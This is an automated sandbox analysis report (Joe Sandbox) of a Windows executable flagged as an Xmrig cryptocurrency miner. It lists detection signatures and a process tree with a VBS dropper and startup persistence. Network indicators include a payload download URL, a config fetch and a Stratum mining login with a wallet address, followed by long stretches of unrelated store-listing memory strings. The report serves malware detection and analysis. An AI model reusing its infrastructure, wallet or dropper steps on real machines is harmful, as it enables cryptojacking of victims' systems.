Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report P7Oa6i5muL

Overview

General Information

Sample Name:P7Oa6i5muL (renamed file extension from none to exe)
Analysis ID:448402
MD5:9dbcf183762872d8917b8a19535a0c65
SHA1:94d27127f8ffbebec6ad803599ed3c0477a15e3c
SHA256:759d3e20098353e73c0c417ecf755a3ab24cdf7ead10df8c5a4aab549d7423f2
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Detected Stratum mining protocol
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • P7Oa6i5muL.exe (PID: 4116 cmdline: 'C:\Users\user\Desktop\P7Oa6i5muL.exe' MD5: 9DBCF183762872D8917B8A19535A0C65)
    • P7Oa6i5muL.exe (PID: 2492 cmdline: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe MD5: 9DBCF183762872D8917B8A19535A0C65)
      • jwMZjhPggeDR.exe (PID: 2520 cmdline: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe MD5: 77276DDC82248473D033E2494C438A97)
      • notepad.exe (PID: 2168 cmdline: 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg' MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
      • cmd.exe (PID: 6140 cmdline: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 3888 cmdline: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • svchost.exe (PID: 2396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2292 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5400 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3112 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1724 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5884 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1832 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 3016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x14:$file: URL=
    • 0x0:$url_explicit: [InternetShortcut]

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000000.221202486.00000000035D0000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000007.00000003.456029595.0000018420035000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000006.00000000.224986002.00000000035D0000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000005.00000002.470611042.0000000003320000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000006.00000000.229478984.00000000035D0000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 4 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              6.0.jwMZjhPggeDR.exe.35d0000.3.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                6.0.jwMZjhPggeDR.exe.35d0000.5.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  6.0.jwMZjhPggeDR.exe.35d0000.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    6.2.jwMZjhPggeDR.exe.35d0000.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      5.2.P7Oa6i5muL.exe.3320000.3.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                        Click to see the 2 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: WScript or CScript DropperShow sources
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine|base64offset|contains: Y'+, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6140, ProcessCommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ProcessId: 3888

                        Data Obfuscation:

                        barindex
                        Sigma detected: Drops script at startup locationShow sources
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 3888, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for URL or domainShow sources
                        Source: http://45.144.225.135/notepad.exeAvira URL Cloud: Label: malware
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: http://45.144.225.135/notepad.exeVirustotal: Detection: 13%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\ProgramData\LKBNMTFJgl\csrssReversingLabs: Detection: 20%
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeReversingLabs: Detection: 20%
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: P7Oa6i5muL.exeVirustotal: Detection: 20%Perma Link
                        Source: P7Oa6i5muL.exeReversingLabs: Detection: 20%
                        Source: 6.2.jwMZjhPggeDR.exe.35d0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 6.0.jwMZjhPggeDR.exe.35d0000.3.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 5.2.P7Oa6i5muL.exe.3320000.3.unpackAvira: Label: TR/Dropper.Gen
                        Source: 6.0.jwMZjhPggeDR.exe.35d0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 5.2.P7Oa6i5muL.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 6.0.jwMZjhPggeDR.exe.35d0000.5.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00408B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,FindCloseChangeNotification,5_2_00408B20
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exeCode function: 6_2_035D8B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,6_2_035D8B20

                        Bitcoin Miner:

                        barindex
                        Yara detected Xmrig cryptocurrency minerShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 6.0.jwMZjhPggeDR.exe.35d0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.jwMZjhPggeDR.exe.35d0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.jwMZjhPggeDR.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.jwMZjhPggeDR.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.P7Oa6i5muL.exe.3320000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.P7Oa6i5muL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.P7Oa6i5muL.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000000.221202486.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.456029595.0000018420035000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.224986002.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.470611042.0000000003320000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.229478984.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 2168, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: P7Oa6i5muL.exe PID: 2492, type: MEMORY
                        DNS related to crypt mining poolsShow sources
                        Source: unknownDNS query: name: xmr-us-east1.nanopool.org
                        Detected Stratum mining protocolShow sources
                        Source: global trafficTCP traffic: 192.168.2.3:49721 -> 144.217.14.139:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.

                        Compliance:

                        barindex
                        Detected unpacking (creates a PE file in dynamic memory)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeUnpacked PE file: 5.2.P7Oa6i5muL.exe.3320000.3.unpack
                        Source: P7Oa6i5muL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: P7Oa6i5muL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: global trafficTCP traffic: 192.168.2.3:49721 -> 144.217.14.139:14444
                        Source: Joe Sandbox ViewIP Address: 45.144.225.135 45.144.225.135
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00404B00 GetTickCount,GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,GetTickCount,HttpOpenRequestA,GetTickCount,GetTickCount,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_00404B00
                        Source: global trafficHTTP traffic detected: GET /config.txt HTTP/1.1Accept: text/*, application/exe, application/zlib, application/gzip, application/applefileUser-Agent: WinInetGet/0.1Host: 45.144.225.135Connection: Keep-AliveCache-Control: no-cache
                        Source: svchost.exe, 00000019.00000002.347865649.00000247260EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
                        Source: svchost.exe, 00000019.00000002.347865649.00000247260EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
                        Source: svchost.exe, 00000019.00000002.348092248.0000024726949000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-12T08:53:15.0765583Z||.||fe7f9289-8a69-4e31-ba45-f01eb7d6620b||1152921505693653746||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                        Source: svchost.exe, 00000019.00000002.348092248.0000024726949000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-12T08:53:15.0765583Z||.||fe7f9289-8a69-4e31-ba45-f01eb7d6620b||1152921505693653746||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 